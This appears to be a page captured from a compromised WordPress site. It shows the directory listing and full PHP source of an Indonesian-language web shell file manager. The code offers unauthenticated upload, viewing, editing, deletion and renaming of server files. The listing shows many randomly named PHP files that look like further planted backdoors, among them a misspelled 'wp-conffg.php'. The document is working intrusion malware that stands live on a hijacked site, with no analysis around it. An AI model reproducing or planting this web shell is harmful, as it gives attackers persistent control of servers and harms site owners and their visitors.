H69UNtblNBNpha2dtB1Odn8qYp1Qk5NK2gi7yfceofo9N
Root
/ yeezy-supply.com
Nama File / Folder
Size
Action
.well-known
--
NONE
1d8f5
--
NONE
osldajr
--
NONE
wp-admin
--
NONE
wp-content
--
NONE
wp-includes
--
NONE
wyncghb
--
NONE
.htaccess
0.23KB
Hapus
Edit
Rename
av.php
39.958KB
Hapus
Edit
Rename
config.php
1.066KB
Hapus
Edit
Rename
configuration.php
1.363KB
Hapus
Edit
Rename
default.php
1.066KB
Hapus
Edit
Rename
dhaxstpu.php
1.039KB
Hapus
Edit
Rename
error_log
0.603KB
Hapus
Edit
Rename
index.php
2.261KB
Hapus
Edit
Rename
jozkxudd.php
0.742KB
Hapus
Edit
Rename
main.php
1.363KB
Hapus
Edit
Rename
popyrirp.php
1.039KB
Hapus
Edit
Rename
postnews.php
0.327KB
Hapus
Edit
Rename
qxioaoas.php
0.327KB
Hapus
Edit
Rename
robots.txt
0.079KB
Hapus
Edit
Rename
rtfzdkpj.php
1.107KB
Hapus
Edit
Rename
sfcl.php
54.087KB
Hapus
Edit
Rename
srimlvxz.php
1.107KB
Hapus
Edit
Rename
ssndrhib.php
1.107KB
Hapus
Edit
Rename
themes.php
7.622KB
Hapus
Edit
Rename
thhjkbma.php
2.295KB
Hapus
Edit
Rename
tvjkiwwx.php
0.742KB
Hapus
Edit
Rename
umcnkpmb.php
1.107KB
Hapus
Edit
Rename
wfvhbwqu.php
0.742KB
Hapus
Edit
Rename
wp-blog-header.php
1.066KB
Hapus
Edit
Rename
wp-conffg.php
122.703KB
Hapus
Edit
Rename
wp-config.php
1.066KB
Hapus
Edit
Rename
wp-cron.php
0.327KB
Hapus
Edit
Rename
wp-settings.php
1.066KB
Hapus
Edit
Rename
xpnnjeyt.php
0.624KB
Hapus
Edit
Rename
<=Back
<?php error_reporting(0); ?> <!DOCTYPE html> <html> <head> <title>RBSofh76NF9sW6C1GMohW3NaVvIneqoDppimGP1Ni1I46</title> <link href="https://fonts.googleapis.com/css2?family=Courgette&family=Cuprum:ital@1&family=Rowdies&display=swap" rel="stylesheet"> </head> <style> * { font-family: cursive; color: #000; font-family: 'Cuprum', sans-serif; } body { background-repeat: no-repeat; background-attachment:fixed; background-size: 100% 1700px; } body h1{ color: #A52A2A; text-shadow: 2px 2px 2px #000; font-size: 50px; } .dir { text-align: center; font-size: 30px; } .dir a{ text-decoration: none; color: #48D1CC; text-shadow: 1px 1px 1px #000; } .dir a:hover{ text-decoration: none; color: red; } table { margin: 12px auto; height: 100%; border-collapse: collapse; font-size: 30px; } table,th { border-top:1px solid #000; border-right:3px solid #000; border-bottom: 3px solid #000; border-left:1px solid #000; box-sizing: border-box; padding: 2px 2px; color: #F0E68C; text-shadow: 1px 1px 1px #000; } table,td { border-top:1px solid #000; border-right:3px solid #000; border-bottom: .5px solid #000; border-left:1px solid #000; box-sizing: border-box; padding: 8px 8px; color: red; } table,td a { text-decoration: none; color:#8A2BE2; text-shadow: 1px 1px 1px #000; } table,td a:hover { text-decoration: none; color: red; } .button1 { width: 70px; height: 30px; background-color: #999; margin: 10px 3px; padding: 5px; color: #000; border-radius: 5px; border: 1px solid #000; box-shadow: .5px .5px .3px .3px #fff; box-sizing: border-box; } .button1 a{ width: 70px; height: 30px; background-color: #999; margin: 10px 3px; padding: 5px; color: red; border-radius: 5px; border: 1px solid #000; box-shadow: .5px .5px .3px .3px #fff; box-sizing: border-box; } .button1:hover { text-shadow: 0px 0px 5px #fff; box-shadow: .5px .5px .3px .3px #555; text-decoration: none; } textarea { border: 1px solid green; border-radius: 5px; box-shadow: 1px 1px 1px 1px #fff; width: 100%; height: 400px; padding-left: 10px; margin: 10px auto; resize: none; background: green; color: #ffffff; font-family: 'Cuprum', sans-serif; font-size: 13px; } </style> <body> <center><h1>H69UNtblNBNpha2dtB1Odn8qYp1Qk5NK2gi7yfceofo9N</h1></center> <div class="dir"> <?php // Base directory yang tetap $baseDir = getcwd(); // atau tentukan path manual: $baseDir = "/path/to/your/directory"; if (isset($_GET['dir'])) { // Decode dari base64 dan pastikan tidak keluar dari base directory $decodedDir = base64_decode($_GET['dir']); if (strpos(realpath($decodedDir), realpath($baseDir)) === 0) { $dir = $decodedDir; } else { $dir = $baseDir; } } else { $dir = $baseDir; } $dir = str_replace("\\", "/", $dir); // Breadcrumb yang disamarkan - hanya tampilkan nama folder terakhir $dirs = explode("/", $dir); $displayDir = end($dirs) ?: '/'; echo '<a href="?dir='.base64_encode($baseDir).'">Root</a> / '; echo $displayDir; if (isset($_POST['submit'])){ $namafile = $_FILES['upload']['name']; $tempatfile = $_FILES['upload']['tmp_name']; $error = $_FILES['upload']['error']; $ukuranfile = $_FILES['upload']['size']; if(move_uploaded_file($tempatfile, $dir.'/'.$namafile)) { echo "<script>alert('diupload!!!');</script>"; } else { echo "<script>alert('Upload gagal!!!');</script>"; } } ?> <form method="post" enctype="multipart/form-data"> <input type="file" name="upload"> <input type="submit" name="submit" value="Upload"> </form> </div> <table> <tr> <th>Nama File / Folder</th> <th>Size</th> <th>Action</th> </tr> <?php $scan = scandir($dir); $currentDirEncoded = base64_encode($dir); foreach ($scan as $directory) { if (!is_dir($dir.'/'.$directory) || $directory == '.' || $directory == '..') continue; echo ' <tr> <td><a href="?dir='.base64_encode($dir.'/'.$directory).'">'.$directory.'</a></td> <td>--</td> <td>NONE</td> </tr> '; } foreach ($scan as $file) { if (!is_file($dir.'/'.$file)) continue; $jumlah = filesize($dir.'/'.$file)/1024; $jumlah = round($jumlah, 3); if ($jumlah >= 1024) { $jumlah = round($jumlah/1024, 2).'MB'; } else { $jumlah = $jumlah .'KB'; } echo ' <tr> <td><a href="?dir='.$currentDirEncoded.'&open='.base64_encode($dir.'/'.$file).'">'.$file.'</a></td> <td>'.$jumlah.'</td> <td> <a href="?dir='.$currentDirEncoded.'&delete='.base64_encode($dir.'/'.$file).'" class="button1">Hapus</a> <a href="?dir='.$currentDirEncoded.'&ubah='.base64_encode($dir.'/'.$file).'" class="button1">Edit</a> <a href="?dir='.$currentDirEncoded.'&rename='.base64_encode($dir.'/'.$file).'&nama='.urlencode($file).'" class="button1">Rename</a> </td> </tr> '; } if (isset($_GET['open'])) { $filePath = base64_decode($_GET['open']); if (file_exists($filePath) && strpos(realpath($filePath), realpath($baseDir)) === 0) { echo ' <br /> <style> table { display: none; } </style> <textarea>'.htmlspecialchars(file_get_contents($filePath)).'</textarea> '; } } if (isset($_GET['delete'])) { $filePath = base64_decode($_GET['delete']); if (file_exists($filePath) && strpos(realpath($filePath), realpath($baseDir)) === 0) { if (unlink($filePath)) { echo "<script>alert('dihapus');window.location='?dir=".$currentDirEncoded."';</script>"; } } } if (isset($_GET['ubah'])) { $filePath = base64_decode($_GET['ubah']); if (file_exists($filePath) && strpos(realpath($filePath), realpath($baseDir)) === 0) { echo ' <style> table { display: none; } </style> <a href="?dir='.$currentDirEncoded.'" class="button1"><=Back</a> <form method="post" action=""> <input type="hidden" name="object" value="'.htmlspecialchars($filePath).'"> <textarea name="edit">'.htmlspecialchars(file_get_contents($filePath)).'</textarea> <center><button type="submit" name="go" value="Submit" class="button1">Liking</button></center> </form> '; } } if (isset($_POST['edit']) && isset($_POST['object'])) { $filePath = $_POST["object"]; if (strpos(realpath($filePath), realpath($baseDir)) === 0) { $data = fopen($filePath, 'w'); if (fwrite($data, $_POST['edit'])) { echo '<script>alert("Berhasil diedit!!!");window.location="?dir='.$currentDirEncoded.'";</script>'; } else { echo "<script>alert('gagal');</script>"; } fclose($data); } } if(isset($_GET['rename'])){ $filePath = base64_decode($_GET['rename']); $fileName = isset($_GET['nama']) ? urldecode($_GET['nama']) : ''; if(isset($_POST['newname']) && $filePath && strpos(realpath($filePath), realpath($baseDir)) === 0){ $newName = $_POST['newname']; $newPath = dirname($filePath) . '/' . $newName; if(rename($filePath, $newPath)){ echo '<font color="green">Ganti Nama Berhasil</font><br/>'; echo "<script>window.location='?dir=".$currentDirEncoded."';</script>"; }else{ echo '<font color="red">Ganti Nama Gagal</font><br />'; } } if($filePath && strpos(realpath($filePath), realpath($baseDir)) === 0){ echo '<br><center><form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.htmlspecialchars($fileName).'" /> <input type="hidden" name="path" value="'.htmlspecialchars($dir).'"> <input type="submit" value="Go" /> </form></center>'; } } ?> </table> </body> </html>
Liking